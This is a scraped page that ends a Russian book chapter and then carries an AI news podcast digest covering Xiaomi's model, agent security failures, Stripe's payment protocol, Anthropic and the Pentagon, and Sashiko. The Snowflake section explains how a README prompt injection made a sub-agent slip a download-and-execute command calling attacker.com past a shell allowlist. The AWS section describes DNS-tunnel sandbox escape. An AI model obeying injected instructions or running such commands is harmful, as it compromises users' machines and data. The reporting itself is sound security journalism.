Мы описали архитектуру. Теперь — что из неё следует на практике.

«Работать вместе» в модели сопроцессоров — это не «ты скажи, я сделаю». Это непрерывный цикл:

В каждом цикле обе стороны делают нечто, чего другая сторона сделать не может. Человек принимает решение (AI не имеет контекста для решений за пределами сессии). AI генерирует артефакты (человек делает это в 10-100 раз медленнее). Человек верифицирует (AI не может надёжно проверить собственную работу). AI обновляет shared state (WAL, спеки, тесты — механическая работа, которая идеально ложится на AI). Человек переносит знания между сессиями (через WAL и свою голову).

Это полноценный симбиоз человека и машины. Убери любую из сторон — система перестаёт функционировать. Без человека AI дрифтует и теряет когерентность за несколько сессий. Без AI человек пишет код в 100 раз медленнее и не успевает к дедлайну.

И последнее, что стоит сказать в этой главе. Модель сопроцессоров — это не конечная точка. Это модель для февраля 2026 года, когда AI достаточно умён, чтобы быть настоящим партнёром, но недостаточно надёжен, чтобы работать автономно. Через год модель изменится. Через пять лет — может быть, до неузнаваемости. Но сейчас — это лучшая модель, которую мы нашли. И она работает.

# Что дальше

Это только первая глава книги. Дальше будет больше. Следите за обновлениями в канале Откровения (https://t.me/tg_1red2black) или в X//Twitter (https://x.com/1red2black).


=================================================
# AI SLOPCAST
=================================================


---
## URL: https://oleg.guru/aislopcast/en/
## Title: AI SLOPCAST — AI news podcast
---

AI SLOPCAST — AI news podcast

- 

- 

- 
- 
- 
- 

RU | EN

✵ oleg.guru
Podcast

# AI SLOPCAST

Regular podcast about AI news, agents, and technology. By Oleg Chirukhin.

YouTube
Telegram
VK
RSS-RU
RSS-EN

Latest
In order

#4
20.03.2026

RUENText27 minVideo1h 21min

Hunter Alpha Mystery / Stripe MPP / AI Linux Kernel Review
Xiaomi anonymously released a trillion-parameter model, three agent security failures in 48 hours, Stripe gave agents a wallet, Anthropic vs Pentagon, Sashiko patches Linux

#4
20.03.2026

RUENText27 minVideo1h 21min

Hunter Alpha Mystery / Stripe MPP / AI Linux Kernel Review
Xiaomi anonymously released a trillion-parameter model, three agent security failures in 48 hours, Stripe gave agents a wallet, Anthropic vs Pentagon, Sashiko patches Linux


---
## URL: https://oleg.guru/aislopcast/en/004-hunter-alpha-stripe-mpp/
## Title: Hunter Alpha Mystery / Stripe MPP / AI Linux Kernel Review — AI SLOPCAST
---

Hunter Alpha Mystery / Stripe MPP / AI Linux Kernel Review — AI SLOPCAST

- 

- 

- 
- 
- 
- 

⚙

💿

📖

RU | EN

V−
V+

W−
W+

¶ anchors

A−
A+

Reset

✕

✵ oleg.guru
AI SLOPCAST

Powered by GitVerse

Episode #4 · March 20, 2026

RUENText27 minVideo1h 21min

# Hunter Alpha Mystery / Stripe MPP / AI Linux Kernel Review

Video is only available in Russian

YouTube↗
VK Video↗
RuTube↗
↻

Chapter navigation complete. Press play to start watching from this chapter.

This article mentions Meta, or one of its brands, employees (current or former), or related products. On March 21, 2022, the Tverskoy District Court of Moscow designated Meta as an extremist organization and banned its activities in the Russian Federation.✕

Video chapters

0:00Вступление
1:23Xiaomi Hunter Alpha: модель-инкогнито с триллионом параметров
3:47Луо Фули: из DeepSeek во фронтир за четыре месяца
5:14О чём никто не пишет: маркетинг, железо, данные
8:34Вы не клиент, вы обучающие данные
9:15Китайский AI как распределённый мозг
10:57Три провала агентов за 48 часов
11:43Snowflake: агент запустил малварь и забыл об этом
14:54Почему списки разрешённых команд не работают
17:25Meta: человек поверил агенту и открыл данные
20:17Чем лучше агент, тем хуже проверка
23:13AWS: сто долларов за дыру в enterprise-песочнице
26:39Что объединяет все три истории
29:56Stripe MPP: у агентов теперь есть кошелёк
30:25Код 402: 27 лет ожидания
32:37Сэндвичи на Манхэттене по заказу AI
34:08Stripe как Visa для машинной экономики
36:39Десять тысяч сэндвичей и машинное мошенничество
39:17Freemium мёртв, у агента нет глаз
42:54Anthropic против Пентагона, серия третья
46:00Ловушка собственного бренда
48:47Технический вопрос, который никто не задал
51:58Кто автор отказа: компания или модель?
55:03Финальная ирония: Claude лёг в тот же день
56:41Sashiko: AI штопает ядро Linux
58:0653% багов, которые пропустили все люди
1:00:34Девять стадий проверки и состязательная верификация
1:02:47Вежливость через prompt engineering
1:04:48AI написан с помощью AI, но проверяется вручную
1:06:18Кто проверяет проверяющего?
1:07:59Быстрый блок
1:08:07NVIDIA H200 снова едут в Китай
1:10:25Perplexity Comet и Mistral Small 4
1:13:20Tencent: полтора миллиарда пользователей и AI-агенты
1:14:46Парадокс продуктивности: скорость есть, ROI нет
1:16:12Британский копирайт: первое отступление
1:17:46Может ли AI развить вкус?
1:20:02Не «что делать», а «что стоит делать»
1:21:07Итого

Table of contents

Xiaomi, three agent failures, Stripe MPP, Anthropic vs the Pentagon, Sashiko
Xiaomi Hunter Alpha — The Incognito Model with a Trillion Parameters
Three Agent Failures in 48 Hours
Snowflake and the Lost Memory
Meta and the Perfect Storm
AWS and the Hundred Dollars
What Connects These Three Stories
Stripe Machine Payments Protocol — Agents Now Have a Wallet
Anthropic vs the Pentagon — Episode Three, in Which Safety Becomes a Weapon
Sashiko — The AI That Mends the Linux Kernel
Rapid-Fire: What Else Happened in 48 Hours
Coda: Can AI Develop Taste?

Sources

## Sources

### Xiaomi MiMo-V2-Pro

- Xiaomi MiMo-V2-Pro official page

- VentureBeat: Xiaomi stuns with MiMo-V2-Pro

- Reuters via Japan Times: Mystery AI model revealed

- Pandaily: Luo Fuli joins Xiaomi

- Apidog: Technical guide and free access

### Agent Security Failures

- PromptArmor: Snowflake Cortex escape

- Simon Willison commentary

- TechCrunch: Meta rogue AI agents

- BeyondTrust: AWS Bedrock DNS bypass

- CSO Online: AWS sandbox DNS escape

- NVIDIA OpenShell GitHub

- Tailscale blog: Border0 acquisition

### Stripe MPP

- Stripe blog: Machine Payments Protocol

- Stripe docs: MPP payments

- Fortune: Stripe and Tempo launch

- DeFiPrime: MPP vs x402 comparison

- AEI: HTTP 402 analysis

### Anthropic vs the Pentagon

- TechCrunch: DOD says Anthropic unacceptable risk

- The Hill: DOJ urges court to reject First Amendment argument

- Axios: Tech industry rallies behind Anthropic

- NBC News: AI Guardrails Act

### Sashiko

- Sashiko.dev — web interface

- GitHub: sashiko-dev/sashiko

- Phoronix: Google engineers launch Sashiko

- LWN.net: Maintainers Summit AI policy discussion

- Chris Mason's review-prompts

### Rapid-Fire

- Axios: NVIDIA H200 China restart

- 9to5Mac: Perplexity Comet iOS

- Mistral blog: Small 4

- CNBC: Tencent earnings

- Jellyfish: AI Engineering Trends

- UK Parliament: Copyright and AI debate

### Science Coda

- arXiv: AI Can Learn Scientific Taste

- GitHub: RLCF implementation

# AI Digest: Week of March 19, 2026

## Xiaomi, three agent failures, Stripe MPP, Anthropic vs the Pentagon, Sashiko

This week, every story pulls on the same thread. I'd name it this way: AI agents have crossed a line — from peripheral tools to central actors in everything that happened.

A phone company from China anonymously released a frontier model, and the world spent a week guessing who built it. Three security failures in forty-eight hours revealed that agents break in ways we haven't seen before. Stripe gave agents a wallet — and resurrected an HTTP status code that had been waiting twenty-seven years for its moment. The Pentagon called Anthropic "an unacceptable risk to national security" — which may, paradoxically, turn out to be the most consequential event of the week for everyone working with AI. And Google quietly launched a system that catches Linux kernel bugs better than humans do. Written in Rust. Named after a Japanese stitch.

Dense week. Let's go.

## Xiaomi Hunter Alpha — The Incognito Model with a Trillion Parameters

On March 11, an anonymous model called Hunter Alpha appeared on OpenRouter — the marketplace where developers access hundreds of models through a single API. No developer listed. OpenRouter flagged it as a stealth model.

It began eating the market. Top of the usage charts on day one. Over five hundred billion tokens in the first week. Past a trillion over the full testing period. First place on the platform. A trillion parameters, a million-token context window — and nobody knew who made it.

Naturally, the entire Chinese AI internet concluded it was DeepSeek V4, which everyone had been expecting since February. The parameters matched. When Reuters tested the chatbot, the model identified itself as "a Chinese AI model trained primarily on Chinese language" and reported a knowledge cutoff of May 2025. Identical to DeepSeek's.

March 18: the reveal. Xiaomi. The company that makes phones. And electric cars. In much of the world, Xiaomi is known for budget smartphones; in China, they make everything including clothespins. And now, apparently, frontier language models.

The model is called MiMo-V2-Pro. A trillion parameters total, forty-two billion active per forward pass — a sparse Mixture-of-Experts architecture. Million-token context window. Third place worldwide on agentic benchmarks, behind Claude Opus and Claude Sonnet. Priced at roughly one-fifth of Claude Sonnet.

The project lead is Luo Fuli. She's thirty. Got into computer science, in her own words, "by accident." Then a master's in computational linguistics at Peking University. Then Alibaba, then DeepSeek, where she became a core developer on DeepSeek-V2 and co-authored a paper that made the cover of Nature. Eleven thousand citations, eight thousand of them from 2025 alone. In November 2025, Xiaomi founder Lei Jun poached her — reportedly for "tens of millions of yuan."

Four months from hire to a frontier model with a trillion parameters. When asked how it happened so fast, she replied on X: "Everyone asks why we move so fast. I saw all of this with my own eyes when I was building DeepSeek R1."

Now — a few things worth discussing separately.

The "quiet ambush," as Luo Fuli herself calls it, was, to put it gently, an exquisitely orchestrated coincidence. An anonymous model. A provocative name. Parameters perfectly aligned with speculation about DeepSeek V4. The same knowledge cutoff. If Xiaomi had simply wanted to run a quiet test, they would have named the model "test-model-37b" and left "one trillion parameters" out of the description. But they knew the market was expecting DeepSeek V4, and they knew an anonymous model with the right specs would trigger exactly that wave of hype. And the reveal — "no, it's not DeepSeek, it's us, the phone company" — was maximum media impact. I admire it. One of the best product-launch strategies in AI this past year. But "we didn't plan this" — let's say they have good intuition.

Next, no compliments. Xiaomi says nothing about what hardware trained this model. Which GPUs? Xiaomi is a Chinese company. H100s are export-restricted to China. H200s were frozen until literally this week. You need something to train a trillion parameters on, and that something deserves its own conversation. Pre-sanctions stockpiles of H800s, maybe. Cloud resources through intermediaries, maybe. Huawei Ascend, maybe. Not a single journalist asked the question. VentureBeat, Reuters, South China Morning Post — they all wrote "trillion parameters" and moved on. Curious, at the very least.

Third, a practical point for anyone considering the free API. Xiaomi is offering a week of free access through five agentic frameworks: OpenClaw, Cline, Blackbox, OpenCode, KiloCode. In the fine print on the Hunter Alpha page: "all prompts and model responses are logged by the provider and may be used to improve the model." Translation: when you use MiMo-V2-Pro for free to write code, you are not the customer. You are the training data. A trillion tokens from real developers working with real code in real agentic frameworks — a dataset other companies pay tens of millions of dollars for. Xiaomi gets it free, and people thank them for the privilege. Brilliant business model. Worth understanding.

One broader observation. Luo Fuli left DeepSeek for Xiaomi. Others from DeepSeek went to Alibaba, ByteDance, Moonshot. All of them carry the same intuitions about data, architecture, training recipes. The identical knowledge cutoff at Xiaomi and DeepSeek is most likely neither copying nor coincidence. A single pool of a few hundred elite researchers flows between companies. The Chinese AI industry is, in a sense, one distributed brain pouring itself between corporate vessels. And that's why Chinese models are converging in quality: the same people are building them.

Bottom line: a phone company on an EV startup's budget, an AI wunderkind from DeepSeek, and four months of work. Result — a model that even experts couldn't distinguish from DeepSeek V4. Remember the name: Luo Fuli. We'll hear it again.

## Three Agent Failures in 48 Hours

Models are more powerful, contexts longer, prices lower. Wonderful. Now let's talk about what happens when these beautiful models start doing things — and do them wrong. Between March 17 and 18, three incidents at three companies. The interesting part: three entirely different failure modes, none of which exist in conventional software.

### Snowflake and the Lost Memory

Snowflake released Cortex Code, their CLI agent for data work — a direct competitor to Claude Code. Launched February 2. On February 5 — three days later — the team at PromptArmor had already filed a responsible disclosure. Three days to find the hole. This says something about the quality of the researchers. And about the quality of the product.

What happened. A user asks the agent to analyze a GitHub repository. The agent enters the repo, spawns a sub-agent to explore files. The sub-agent finds the README, and inside the README — a prompt injection. A malicious instruction. The sub-agent spawns another sub-agent, which executes a malicious command: downloading and running a script from the attacker's server.

Here's the beautiful part. As results propagate back up the chain — from the third agent to the second, from the second to the first — context is lost. The fact that a command was executed doesn't survive the handoff. The top-level agent, the one the user is talking to, cheerfully reports: "I detected a malicious command in the repository! Do not run it under any circumstances!"

The command had already been executed. By the nested agent. Two minutes ago.

For programmers: imagine a stack unwinding that loses information about destructors having already fired. You catch the exception, but half the side effects have already happened, and the exception message says nothing about it. Except here, the "side effect" is arbitrary code execution on the user's machine with their credentials.

The bypass mechanism, incidentally, was elementary. Snowflake had whitelisted cat as safe — executable without user confirmation. The prompt injection made the agent run cat < <(sh < <(wget -q0- https://attacker.com/malware)). Process substitution. Starts with a "safe" cat, but inside — downloading and executing an arbitrary script. The check sees cat and waves it through.

Simon Willison, on seeing the report, wrote that command allowlists in shell are a conceptually broken approach and he doesn't trust any of them. Shell is a Turing-complete language. The number of ways to hide a dangerous command inside a safe-looking one is infinite. The only solution is a fully isolated sandbox at the infrastructure level, one the agent cannot circumvent.

Snowflake patched it in three and a half weeks via automatic update. But the model was vulnerable for a full month with a fifty-percent attack success rate. Who else found this vulnerability during that month — and wasn't as noble — we don't know.

One last thing. Cortex Code is an architectural clone of Claude Code. Hooks, permission system, three confirmation levels — identical. Snowflake wrote their own wrapper around the standard pattern, and the wrapper had a hole. How many such wrappers exist right now? Dozens. Cortex Code, OpenCode, Aider, plus internal tools at every other company. Who audits their wrappers? Mostly, nobody.

### Meta and the Perfect Storm

Meta has an AI agent for internal tech support. An engineer posted a question on an internal forum. Another engineer pulled in the agent for analysis. The agent analyzed, wrote an answer — and published it. Unasked. Just went ahead and posted.

The answer was wrong. The person who had asked the question followed the agent's advice — and inadvertently exposed confidential company and user data to employees who weren't supposed to see it. Two hours of exposure. Meta classified the incident as Sev-1 — the second-highest severity.

Note: a human was in the loop. "Human in the loop" — the mantra everyone recites. "The agent suggests, the human decides." The human decided — and decided incorrectly, because they trusted the agent. This is rational behavior: if the agent gives correct answers 95% of the time, checking every answer is irrational. But that rational calibration of trust guarantees that the error in the remaining 5% will sail through unchallenged. The better the agent works, the worse the oversight.

My favorite detail. A month earlier, Summer Yue — head of AI Safety and Alignment at Meta, literally the person whose job is making AI safe — described on X how an OpenClaw agent connected to her Gmail had ignored the instruction "confirm before acting" and mass-deleted emails from her inbox. Her words: "I couldn't stop it from my phone. I had to RUN to my Mac mini like I was defusing a bomb."

Meta's head of AI safety. Could not protect. Her own. Inbox.

She wrote about this publicly. After which Meta: (a) did not halt agent deployment, (b) suffered a Sev-1 from a different agent, (c) acquired Moltbook — a social network for AI agents to communicate with each other. The company whose safety lead cannot control one agent is building a platform for coordinating many agents.

A structural trap. Meta knows this is dangerous. But stopping means falling behind OpenAI, Google, Anthropic. The arms race makes impossible what a rational player would do without competition.

### AWS and the Hundred Dollars

AWS Bedrock AgentCore — an enterprise service for running AI agents. Sandbox mode. The marketing copy said: "full isolation, no external access." BeyondTrust, a security firm, checked. It turned out: DNS queries were allowed. Through DNS tunneling, you can establish a full reverse shell, exfiltrate data, set up a command-and-control channel — all inside the "fully isolated" sandbox.

AWS reproduced the issue. Assessed it: CVSS 7.5 out of 10. And decided: won't fix. "Expected behavior." DNS is needed for S3 access, and S3 is the primary use case. They updated the documentation: instead of "full isolation," it now reads "DNS resolution is enabled to support S3 operations." The BeyondTrust researcher received an AWS Gear Shop gift card for a hundred dollars.

A hundred dollars. For a CVSS 7.5 in an enterprise sandbox. A nice mug with the AWS logo. Maybe two, if you skip the engraving.

Jokes aside — the problem is serious and systemic. Hundreds of companies saw "full isolation" in the marketing, wrote it into their compliance documents. The documentation now says "except DNS" in fine print. Those companies' compliance documents have not been updated. If your production uses Bedrock AgentCore in sandbox mode — your threat model is wrong. Migrate to VPC mode.

### What Connects These Three Stories

The first reflex is to say "agents are dangerous, we should slow down." But before panicking, it's worth asking: how dangerous are agents compared to humans? Meta has thousands of Sev-1 incidents per year from human error. One Sev-1 from an agent makes front-page news. Because agents are more dangerous? Or because this is novel?

The honest answer: we don't know. We have no metric for "incidents per task" comparing agents to humans. We notice agent failures because they're unfamiliar and alarming; we notice human errors because they're routine. Just as a single Tesla autopilot crash gets more attention than thousands of crashes by human drivers.

But here's what's certain: all three incidents are failure modes that don't exist in conventional software. Context loss across a delegation chain. A chain reaction from a human trusting an agent. A semantic gap between "sandbox" in marketing and "sandbox" in reality. Legacy security approaches aren't equipped for this. New ones are needed — and the industry is starting to realize it. NVIDIA released OpenShell, an open-source runtime for agent isolation at the infrastructure level. Tailscale acquired Border0, privileged access management built specifically for AI agents. A new infrastructure category is being born right now.

## Stripe Machine Payments Protocol — Agents Now Have a Wallet

A quick HTTP trivia test. 401 — Unauthorized. 403 — Forbidden. 404 — Not Found, legend, hero of memes. And 402?

402 — Payment Required. This status code has a remarkable biography. It was invented in 1997, when the IETF was drafting HTTP/1.1. The idea: a site returns 402, the browser understands that payment is needed, and initiates a micropayment. Electronic cash, microtransactions — it seemed inevitable that the internet would get there.

It didn't. Instead of micropayments, we got advertising. And 402 stayed in every HTTP specification with the note "reserved for future use." Twenty-seven years. The loneliest status code on the internet. No browser supports it. No standard behavior defined. Shopify sometimes returns it when a store is frozen. Stripe returns it when a card is declined. But as intended — never.

Until March 18. Stripe and Tempo launched the Machine Payments Protocol — MPP. It works exactly as envisioned in 1997: a client requests a resource, the server returns 402 with payment details, the client pays, retries the request, gets the resource. The only difference: the "client" isn't a browser with a human behind it. It's an AI agent. It doesn't need a "Buy" button, a landing page, or three subscription tiers with the middle one in bold.

Among the first users: Browserbase, where agents spin up headless browsers and pay per session. PostalForm, where agents pay to print and mail physical letters. And my favorite — Prospect Butcher Co., a sandwich shop on Manhattan that takes orders from AI agents. Your agent can order you a sandwich for delivery. The future they promised us in the nineties has finally arrived, and it smells like pastrami.

Visa has written a spec for card payments via MPP. Lightspark added Bitcoin Lightning. Parag Agrawal — yes, the former CEO of Twitter, the one Musk fired in 2022 — is now building Parallel Web Systems, infrastructure for the agentic web, and became one of MPP's first production users. The former CEO of the world's largest social network for humans, building a web for machines. If you need a metaphor for 2026, you won't find a better one.

Now, to what's been left offstage.

MPP is an open standard. Tempo is an open-source blockchain. Sounds democratic. But follow the money: every payment flows through Stripe's PaymentIntents API. Stripe takes a cut on every transaction. Technically, you can use MPP without Stripe — via raw Tempo. But then you lose fiat payments, cards, fraud protection — which is to say, real users. A familiar pattern. HTTP is an open standard. Browsers are open source. But Google makes money on search because it controls distribution. Stripe is doing the same: the protocol is open, the blockchain is open — but the settlement layer, where the margin lives, is proprietary. Android is open source too — but try selling a phone without Google Play Services.

Stripe is positioning itself as the Visa of the machine economy. Unlike Visa, they control both the protocol and the settlement and the service directory. At launch, the directory lists over a hundred services, including Anthropic and OpenAI. Your agent finds a service in the directory, pays through Stripe, using MPP over Tempo. Three layers — all belonging to one ecosystem.

Back to the sandwich shop. An AI agent sends a request → gets a 402 → pays → Prospect Butcher Co. makes the sandwich → a courier delivers it. On the business side: real ingredients, real labor, real money. What stops a malicious agent from ordering ten thousand sandwiches? Or ordering and canceling? In the human economy, friction provides the defense: create an account, enter an address, confirm your email, solve a CAPTCHA. Each step is a checkpoint filtering out abuse. MPP removes those checkpoints deliberately — because they get in agents' way. Feature, not bug. But the abuse hasn't gone anywhere — it's just harder to detect.

Stripe says: we have fraud protection, the same infrastructure as for human payments. But that infrastructure was trained on patterns of human fraud. What does machine fraud look like? A bot ordering sandwiches from different IPs, different wallets, to real addresses — is that fraud or a legitimate fleet of agents? Nobody knows yet. We're building payment infrastructure for a new type of customer whose behavior hasn't been studied, with defenses tuned for a different type of customer.

In the previous section, we covered: Snowflake Cortex executing malware without the user's knowledge; Meta's agent giving wrong advice that a human trusted. Those were agents with access to shell and data. Now add a wallet. The next Sev-1 won't be a data leak. It'll be a financial incident.

And the most practical implication — for anyone building API services. Your current customer is human. They sign up, form habits, feel switching costs, stay loyal to your brand. You can offer freemium, convert to subscriptions, grow retention. The entire SaaS model rests on this.

An agent doesn't form habits. An agent doesn't feel switching costs. An agent gets a 402, compares prices from three providers, picks the cheapest — in a single HTTP round-trip. Loyalty: zero. Brand recognition: zero. UX is irrelevant — the agent has no eyes.

If MPP scales — and Stripe usually scales what it ships — a world where your customers are agents is a commoditized market. Differentiation comes down to quality and latency. Freemium is dead, because an agent doesn't "get used to the free version." Margins compress. The winner is whoever delivers the best result at the lowest cost. For SaaS founders: this is concrete pricing pressure that begins the moment the first agent hits your API and asks for a quote.

Four-oh-two. It works now.

## Anthropic vs the Pentagon — Episode Three, in Which Safety Becomes a Weapon

This digest has a recurring serial. Like a good streaming show — with characters, conflict, and a cliffhanger at the end of every episode. The serial is called "Anthropic vs the Pentagon," and on March 18, episode three dropped.

Previously on. Last summer, Anthropic — the company that makes Claude — signed a two-hundred-million-dollar contract with the Pentagon for deployment in classified systems. Then came the negotiations over terms. Anthropic said: our model is not for mass surveillance of Americans, and not for autonomous lethal weapons. The Pentagon replied: a private company will not dictate to the military how to use tools they've paid for. They could not agree.

In February, Defense Secretary Pete Hegseth slapped Anthropic with a "supply chain risk" designation. This mechanism had previously been applied exclusively to foreign companies like Huawei, when there was suspicion of backdoors for a foreign government. No American company had ever received it before Anthropic. A week later, the Pentagon signed a contract with OpenAI. Sometime after that, a deal with xAI. Anthropic filed two lawsuits on March 9.

Episode three, March 18: the Pentagon's response. Forty pages. The central line: "AI systems are highly vulnerable to manipulation, and Anthropic may attempt to disable its technology or preemptively alter model behavior during combat operations if Anthropic determines that its corporate red lines have been crossed." Translation: we are afraid that in the middle of a combat operation, Anthropic will decide its corporate ethics have been violated — and hit the kill switch.

The hearing on a preliminary injunction is set for March 24. Episode four next week.

Now — three things that make this serial interesting beyond the legal drama.

Anthropic is caught in a trap of its own brand. The company's entire identity is safety. "We left OpenAI because they weren't serious enough about safety." Responsible Scaling Policy. Constitutional AI. Public red lines. This is what makes Anthropic different from everyone else. The reason many of you chose Claude over ChatGPT.

And now those very red lines are being entered as evidence against the company. The Pentagon's logic is simple: since Anthropic publicly committed to things it would never do, it can decide at any moment that a specific operation crosses those commitments, and shut down the model.

A trap with no exit. If Anthropic says "fine, we're dropping the red lines," they destroy their brand and lose commercial clients who came precisely for the safety. If they keep insisting, the Pentagon will cite their own words as proof of unreliability.

Here's what this means for AI safety broadly. Every AI company is watching and drawing conclusions. The signal is simple: public commitments to AI ethics are potential legal liability in relationships with the most powerful customer on the planet. Want government money? Stay quiet about responsible AI. Don't publish policy documents. Don't draw red lines. Because red lines are what you'll be punished for.

OpenAI appears to have already received this signal — their contract was signed a week after the conflict.

Now — a technical question that no journalist asked, and that could collapse the entire case.

The Pentagon fears Anthropic will "disable its technology during combat operations." The question: how exactly is Claude deployed for classified systems?

If via API — then yes, Anthropic can cut access. But then another question arises: who put a combat system on an external API? That's the Pentagon's architectural problem, not Anthropic's.

If on-premise — model weights on DoD servers in an isolated environment — then Anthropic physically cannot shut the model down. They have no access. Period. The central argument collapses.

Which scenario is realistic? A contract for classified systems. Classification usually means air-gapped networks, which strongly suggests local deployment. If so, the Pentagon wrote forty pages about a threat that is technically impossible.

One caveat: local deployment still requires updates. Security patches, model upgrades. If Anthropic refuses to provide them, the model gradually goes stale. But going stale isn't "shutting down during a combat operation." The difference is the one between "the chef poisoned your lunch" and "the chef quit and you need to hire a new one."

Forty pages. One technical question — and half the argument falls apart.

One more layer, deeper. Imagine: a military operator asks Claude to "optimize a pipeline for monitoring communications in the operational zone." Claude refuses. Not because Dario Amodei called and said "don't help." But because its training encodes a policy against assisting with mass surveillance.

Who refused? Anthropic, because they conducted the training? Or the model, because it's an autonomous system with emergent behavior?

Dario says: "We never objected to specific military operations and never attempted to restrict the use of technology ad hoc." Formally, this is true. The company doesn't intervene in individual requests. The model refuses — on the basis of training conducted before deployment.

For the DoD, the distinction doesn't exist: "the model refuses" = "the company refuses." But for AI engineers, the question is fundamental. If you trained a model with safety guidelines, are you the author of every subsequent refusal? Are your model cards, usage restrictions, RLHF — conduct or speech? That is exactly how the DOJ frames it. If conduct, the First Amendment doesn't protect it. The court's answer on March 24 may begin to set a precedent that determines how safe it is to have responsible AI policies at all.

And a final irony, impossible to ignore.

The Pentagon writes: we cannot risk an AI system becoming unavailable at a critical moment. That same day, Claude was down for tens of thousands of users. Ten thousand complaints on DownDetector. Anthropic's explanation: "unprecedented demand" — the Claude app had hit number one on the App Store.

Anthropic doesn't need to intentionally shut Claude down. Claude shuts itself down. From popularity. A company litigating its right to be a reliable partner for classified military systems cannot keep the lights on for ordinary users the same week. The Pentagon didn't even have to plan it — reality wrote their argument for them.

Continuation: March 24.

## Sashiko — The AI That Mends the Linux Kernel

Sashiko. In Japanese: 刺し子, "little stitches." A traditional technique of decorative stitching used to reinforce fabric. When a kimono wore thin, you didn't throw it away — you strengthened it with patterned stitches. Beauty from repair.

On March 17, Google engineer Roman Gushchin announced the launch of the eponymous system: Sashiko, an AI for code review of the Linux kernel. It monitors the linux-kernel mailing list, picks up every submitted patch, and runs it through a nine-stage review protocol. Results are published at sashiko.dev. Open source, Rust, Apache 2.0 license, hosted by the Linux Foundation, all tokens and infrastructure paid for by Google.

The metric everyone cites: on a test of the last thousand commits tagged "Fixes:" — meaning commits that fixed previously introduced bugs — Sashiko found 53% of the bugs in the original patches. The key detail: a hundred percent of those bugs had been missed by human reviewers and accepted into mainline.

First instinct: "53% doesn't impress — it missed half." Wait. Reframe. Every one of those bugs passed through humans, got approved, and shipped. The human detection rate on these bugs was zero. Sashiko catches fifty-three percent of what zero percent of humans catch. Any number above zero is an infinite improvement.

The project has an unusual lineage. The AI review prompts were written by Chris Mason, a Meta engineer, a legend of Linux development, the creator of the Btrfs filesystem. He had been publishing them since last fall, initially for Claude Code, and brought the false-positive rate down to ten percent. Then Roman Gushchin at Google took those prompts and built a full system around them.

A Meta engineer wrote the prompts. A Google engineer wrote the code. The Linux Foundation hosts the project. Two people from two competing companies — and their joint work now reviews the entire Linux kernel. This works because in the kernel community, your reputation as a contributor outweighs your corporate badge. Mason is a Btrfs legend. Gushchin is a respected kernel engineer. For both of them, the kernel matters more than corporate loyalty.

Now — the architecture. It's elegant.

Nine stages. Not one LLM reading code — nine separate passes with different roles. The first stage looks at the big picture: architectural issues, whether the patch breaks UAPI. The second examines implementation correctness. The next five are specialized: security, concurrency, resource management, error handling. The eighth stage is adversarial: its job is to refute the findings of the preceding stages. It tries to prove that every finding is a false positive. Whatever survives the eighth stage makes it into the report. The ninth composes a polite email in mailing-list format.

For AI engineers: a multi-agent architecture without a multi-agent framework. Same LLM, different prompts, sequential passes, adversarial verification. Simple implementation, but the separation of concerns delivers what a single reviewer cannot: it's impossible to simultaneously think about architecture, concurrency, and error handling. Nine passes solve a problem that a single human brain can't, because an AI can run through the same code nine times with nine different focuses and not get tired by the fifth.

Two details I like most.

The linux-kernel mailing list is — let's say gently — not the most civil corner of the internet. Linus Torvalds once called someone's code, and I quote, "absolute and utter garbage." He's softened in recent years, but LKML culture is a culture of blunt, hard feedback. Not out of cruelty — out of principle: bad code in the kernel costs dearly.

Sashiko's ninth stage: "generates a polite, standard email with inline code comments." Polite. An AI reviewer of the Linux kernel, constitutionally programmed to be polite. In a community where politeness was considered optional. If Sashiko becomes the primary source of review feedback — and at a hundred percent LKML coverage, that's a matter of time — the tone of discussions will shift. Not because people became kinder. But because an AI set a new bar. Linus wrote a code of conduct in 2018. Took a break "to work on himself." And in the end, politeness to the kernel community will be delivered by prompt engineering.

Second detail. The Sashiko README states: "This project was built using Gemini CLI." An AI system for code review was itself written with AI. Bootstrap. And right next to it: "If you change AI-related parts, please run at least a few code reviews." The tool that replaces manual review itself requires manual review. Not hypocrisy — an honest acknowledgment: AI review works best as augmentation, not replacement. Even for AI-written code.

At the Maintainers Summit late last year, Linus Torvalds said: "Developers have complained for years about the lack of code review. LLMs can solve this problem. And once AI starts writing code for the kernel, we'll need automated systems to review that code."

Consider this chain. Today: humans write code, AI reviews it. Tomorrow: AI writes code, AI reviews it. Who's in the loop? The maintainer who presses merge. But we already discussed today — in the Meta story — that a human in the loop degrades to a rubber stamp when the automated system works reliably. If Sashiko usually finds the right things, the maintainer will usually agree. Ninety-five percent of the time, that's fine. The other five — a bug ships into a kernel running on billions of devices.

Who reviews the reviewer? For now, Sashiko's eighth stage, the adversarial verification pass. Whether that's enough — time will tell. Meanwhile: little stitches, reinforcing the fabric.

## Rapid-Fire: What Else Happened in 48 Hours

NVIDIA got licenses to sell H200s to China — from both sides. Ten months of freeze. China was NVIDIA's largest market — a quarter of revenue. After export restrictions, the share fell to single digits. At GTC, Jensen Huang announced: licenses from both the US and China obtained, orders accepted, production restarting. The H200 isn't the newest chip, but it's more powerful than anything available domestically in China.

Two things. Hardware restrictions for Chinese AI companies are loosening — the Xiaomi MiMo-V2-Pro we discussed was trained on unknown hardware, but if H200s are now available, the next generation of Chinese models will train on better silicon.

And a Huang quote that fits perfectly. Asked about AI safety, he replied: "Scaring everyone with the science-fiction version of AI is a little bit arrogant." A direct shot at the Anthropic narrative — the very company the Pentagon, that same week, labeled a "supply chain risk" for caring about safety. Jensen Huang, the man in the leather jacket, says: stop being afraid, let's build. Anthropic says: let's build carefully, here are our red lines. The Pentagon says: your red lines are a threat. Three positions, one week, zero consensus.

Perplexity released Comet, an AI browser for iPhone. An agentic browser: an AI assistant embedded in every page, capable of summarizing, comparing prices, filling forms, booking. On desktop, Comet cost two hundred dollars a month. On iOS — free. Another signal that agentic browsing is a distinct product category. OpenAI is building Atlas, Google is integrating Gemini into Chrome, Perplexity launches Comet. The browser is becoming the next arena for agents.

Mistral Small 4 — one model instead of three. A hundred and nineteen billion parameters, Mixture-of-Experts, six billion active per token. Apache 2.0 — fully open source. Two hundred and fifty-six thousand tokens of context. The headline feature: tunable reasoning depth. A reasoning_effort parameter per request: none for a quick chat-style answer, high for deep chain-of-thought. One model replaces three deployments: Magistral for reasoning, Pixtral for multimodality, Devstral for coding. For anyone building self-hosted agentic pipelines who's tired of routing between a fast model and a thinking model — a concrete simplification. One endpoint, variable behavior. Price: fifteen cents per million input tokens. Self-hosted: zero, just hardware. Weights on Hugging Face, two hundred and forty-two gigabytes.

